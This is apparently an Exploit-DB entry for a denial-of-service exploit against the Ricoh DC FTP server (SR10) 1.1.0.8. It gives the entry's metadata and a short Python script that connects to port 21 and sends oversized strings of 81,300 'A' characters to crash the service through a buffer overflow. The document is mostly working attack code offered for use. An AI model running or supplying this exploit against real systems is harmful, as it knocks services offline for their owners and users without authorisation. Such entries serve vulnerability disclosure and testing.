[] NeoSense

Ricoh DC (SR10) 1.1.0.8 - Denial of Service

Author: j2x6
type: dos
platform: windows
port: 21.0
date_added: 2015-09-01 
date_updated: 2015-09-03 
verified: 1 
codes: OSVDB-127158 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt38500/38052.png 
application_url: http://www.exploit-db.comdc_software_g.zip

# Exploit Title: Rocoh DC FTP (SR10) v1.1.0.8 DoS
# Date: 8/31/2015
# Exploit Author: j2x6
# Vendor Homepage: http://www.ricoh-imaging.co.jp/
# Software Link: http://www.ricoh-imaging.co.jp/english/r_dc/download/sw/win/07.html
# Version: 1.1.0.8
# Tested on: Windows 7
# Offset for Buffer Overflow attempt: 495

#!/usr/bin/python

import socket

badthing= "A" * 81300

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.45.11',21))
s.send(badthing+'\r\n')
s.send(badthing+'\r\n')
s.send('\r\n')
s.send('EXIT\r\n')
s.close()